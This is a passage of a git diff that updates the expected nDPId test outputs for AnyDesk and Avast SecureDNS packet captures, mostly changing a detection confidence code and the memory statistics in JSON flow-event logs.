{"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} -01559{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}} 
+01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} +01559{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01180{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": 
{"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +01180{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","packets-captured":6963,"packets-processed":6963,"total-skipped-flows":0,"total-l4-payload-len":2418022,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1591342255171} ~~~~~~~~~~~~~~~~~~~~ SUMMARY 
~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6963/6963 @@ -23,9 +23,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6079213 bytes -~~ total memory freed........: 6079213 bytes -~~ total allocations/frees...: 125091/125091 +~~ total memory allocated....: 6212847 bytes +~~ total memory freed........: 6212847 bytes +~~ total allocations/frees...: 127853/127853 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 454 chars ~~ json string max len.......: 1564 chars diff --git a/test/results/avast_securedns.pcapng.out b/test/results/avast_securedns.pcapng.out index a4c77aa6e..15ae7de8a 100644 --- a/test/results/avast_securedns.pcapng.out +++ b/test/results/avast_securedns.pcapng.out 
@@ -2,210 +2,210 @@ 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1625215624443} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625215624443,"flow_last_seen":1625215624443,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625215624443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625215624443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625215624443,"pkt":"eJS0JASgYDjgxTWgCABFAABDZa4AAH8ROYTAqAJktdYjleJyAbsAL0mrSMQBAAABAAAAAAAAATIJU2VDVVJlZG5TBWFWYXNUA0NvTQAAEAAB"} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625215624443,"flow_last_seen":1625215624443,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625215624443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625215624443,"flow_last_seen":1625215624443,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625215624443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625215624563,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625215624563,"pkt":"YDjgxTWgeJS0JASgCABFAADM0kQAADIRGWW11iOVwKgCZAG74nIAuMIZSMSBgAABAAEAAAAAATIJU2VDVVJlZG5TBWFWYXNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":3,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":215,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1625241699450} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241699450,"flow_last_seen":1625241699450,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625241699450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625241699450,"pkt":"eJS0JASgYDjgxTWgCABFAABDEeYAAH8RjUzAqAJktdYjle8RAbsAL9I803MBAAABAAAAAAAAATIJU0VjdVJlRE5zBUF2YXNUA0NPbQAAEAAB"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241699450,"flow_last_seen":1625241699450,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241699450,"flow_last_seen":1625241699450,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625241699572,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625241699572,"pkt":"YDjgxTWgeJS0JASgCABFAADMLtkAADARvtC11iOVwKgCZAG77xEAuEqr03OBgAABAAEAAAAAATIJU0VjdVJlRE5zBUF2YXNUA0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241701462,"flow_last_seen":1625241701462,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241701462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1625241701462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625241701462,"pkt":"eJS0JASgYDjgxTWgCABFAABDEeoAAH8RjUjAqAJktdYjle2jAbsAL7p1TIkBAAABAAAAAAAAATIJU0VDVXJFZE5zBWF2QVN0A0NPTQAAEAAB"} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241701462,"flow_last_seen":1625241701462,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241701462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241701462,"flow_last_seen":1625241701462,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241701462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1625241701583,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625241701583,"pkt":"YDjgxTWgeJS0JASgCABFAADMMogAADIRuSG11iOVwKgCZAG77aMAuDLkTImBgAABAAEAAAAAATIJU0VDVXJFZE5zBWF2QVN0A0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625215624443,"flow_last_seen":1625215624563,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625241701583,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625215624443,"flow_last_seen":1625215624563,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625241701583,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241714666,"flow_last_seen":1625241714666,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241714666,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1625241714666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625241714666,"pkt":"eJS0JASgYDjgxTWgCABFAABDXeQAAH8RQU7AqAJktdYjlfU3AbsAL3hGRwQBAAABAAAAAAAAATIJU2VjVVJlZG5zBUFWYVN0A0NPbQAAEAAB"} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241714666,"flow_last_seen":1625241714666,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241714666,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241714666,"flow_last_seen":1625241714666,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241714666,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1625241714787,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625241714787,"pkt":"YDjgxTWgeJS0JASgCABFAADMRgkAADERpqC11iOVwKgCZAG79TcAuPC0RwSBgAABAAEAAAAAATIJU2VjVVJlZG5zBUFWYVN0A0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":9,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":860,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1625320207133} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320207133,"flow_last_seen":1625320207133,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
